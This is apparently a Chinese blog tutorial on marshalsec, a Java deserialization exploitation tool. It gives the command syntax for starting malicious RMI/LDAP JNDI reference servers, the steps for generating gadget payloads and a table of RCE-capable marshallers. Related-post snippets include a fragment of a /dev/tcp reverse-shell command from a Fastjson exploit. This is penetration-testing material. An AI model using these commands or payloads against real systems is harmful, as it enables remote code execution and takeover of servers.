最新版本marshalsec

最新推荐文章于 2024-05-17 03:20:59 发布
最新推荐文章于 2024-05-17 03:20:59 发布
阅读量5.3k 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/106061464
版权

工具下载

marshalsec-0.3.0.3-SNAPSHOT-all.jar下载

下载地址:https://download.csdn.net/download/Fly_hps/12409277

工具使用

命令格式

marshalsec命令格式如下:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]

参数说明:

  • -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin)
  • -t:对生成的payloads进行解码测试
  • -v:verbose mode, 展示生成的payloads
  • gadget_type:指定使用的payload
  • arguments - payload运行时使用的参数
  • marshalsec.<marshaller>:指定exploits,根目录下的java文件名

开启RMI服务

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启LDAP服务

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

查询可用Gadget

java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson //以Jackson为例

生成特定Payload

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Hessian -v XBean http://127.0.0.1:8080/ExecObject

攻击载荷

目前marshalsec支持的exploit和payload有:

MarshallerGadget Impact
BlazeDSAMF(0|3|X)JDK only escalation to Java serialization various third party libraries RCEs
Hessian|Burlapvarious third party RCEs
Castordependency library RCE
Jacksonpossible JDK only RCE, various third party RCEs
Javayet another third party RCE
JsonIOJDK only RCE
JYAMLJDK only RCE
Kryothird party RCEs
KryoAltStrategyJDK only RCE
Red5AMF(0|3)JDK only RCE
SnakeYAMLJDK only RCEs
XStreamJDK only RCEs
YAMLBeansthird party RCE
FLy_鹏程万里
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
marshalsec-0.0.3-SNAPSHOT-all.jar
08-23
Moritz Bechler编写,源码地址为:https://github.com/mbechler/marshalsec下载下来之后使用maven编译,此工具为编译好的jar包,方便没有编译环境的同学们直接jar包开启ldap和rmi服务 开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 开启ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 我使用这个来测试springboot jolokia的远程命令执行,也可以测试struts2 S系列的漏洞
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
Go最新SnakeYAML配置文件解析器_snakeyaml 读取配置文件注释(8),2024年最新Golang面试题2024中高级
最新发布
2401_84919661的博客
05-17 296
那么如果自己想要加载一个yaml文件的数据怎么做呢?springboot框架中我们可以通过@Value(“${}”)注解加载配置文件中的对象、数组或纯量(scalars)。下面看看如何使用SnakeYAML解析配置文件,
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 883
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
weblogic 反序列化 (CVE-2020-2551)漏洞复现(vulfocus)
qq_40646572的博客
04-27 2183
weblogic 反序列化 (CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。
【fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 942
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
marshalsec.zip
05-11
marshalsec安全工具详解及应用》 在网络安全领域,工具的选择与运用至关重要。其中,"marshalsec"是一款备受关注的安全工具,主要用于Java应用程序的安全分析与漏洞利用。本文将深入探讨marshalsec的核心功能、...
marshalsec-jar-master、marshalsec-jar
05-15
marshalsec-jar-master 是一个开源项目,主要关注Java安全领域中的一个问题,即Java序列化漏洞。这个项目是由安全研究人员创建的,目的是提供一个工具集,帮助开发者和安全专业人员测试和利用Java序列化相关的安全...
marshalsec-0.0.3-SNAPSHOT-all.zip
12-14
0.0.3-SNAPSHOT版本包含了所有功能的全量打包,方便用户直接运行和实验。主要特点包括: 1. **多协议支持**:`marshalsec`支持多种Java反序列化协议,如RMI(远程方法调用)、JMX(Java管理扩展)、Hessian、...
marshalsec-jar-master.zip
12-12
marshalsec-jar-master.zip
java 反序列化利用工具 marshalsec 使用简介
技术超强的网络安全平台
04-04 592
命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyCompar...
Fastjson命令执行漏洞复现(1.2.47和1.2.24)
xiaobai_20190815的博客
04-12 1154
一、漏洞描述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链 二、影响版本 fastjson <=1.2.48(autoType为关闭状态也可使用) 三、漏洞利用 1、docker 拉取镜像,靶机一键起环境 docker-compose up -d 2、本机编辑恶意java文件,用于反弹shell,监听端口为1234,并编译javac Exploit.j
FastJson反序列化漏洞(复现)
小赵同学的博客
07-29 3918
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6911
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
渗透测试-Fastjson 1.2.47 RCE漏洞复现
道阻且长,行则将至。
07-11 7062
漏洞概述 Fastjson是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson 近几年被爆出的反序列化 RCE 漏洞影响无数厂商,2017年官方主动爆出了 fastjson 1.2.24 的反序列化漏洞以及升级公告,fastjson 于1.2.24 版本后增加了反序列化白名单。 而在2019年6月,fastjson 又被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3051
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
shiro反序列化漏洞验证
07-27
您好!对于Shiro反序列化漏洞的验证,可以按照以下步骤进行: 1. 构建恶意的序列化对象:首先,您需要构建一个恶意的序列化对象,该对象可以触发Shiro反序列化漏洞。您可以使用一些常见的工具,如ysoserial或marshalsec,来生成恶意序列化对象。 2. 配置Shiro:接下来,您需要配置Shiro以使用相应的序列化器。在Shiro的配置文件中,确保将序列化器设置为使用Java原生的序列化器(如JavaSerializer)。 3. 运行测试:现在,您可以通过发送恶意的序列化对象来触发Shiro反序列化漏洞。这可能涉及到与目标应用程序进行通信,以发送恶意请求或数据包含恶意对象。 4. 观察结果:如果目标应用程序存在Shiro反序列化漏洞,那么在接收到恶意的序列化对象时,可能会触发远程代码执行或其他不当行为。您可以观察目标应用程序的行为,以确定是否成功验证了漏洞。 请注意,进行漏洞验证时需要遵守相关法律法规,并且仅在授权范围内进行测试。同时,确保在验证过程中不会对目标应用程序造成任何损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值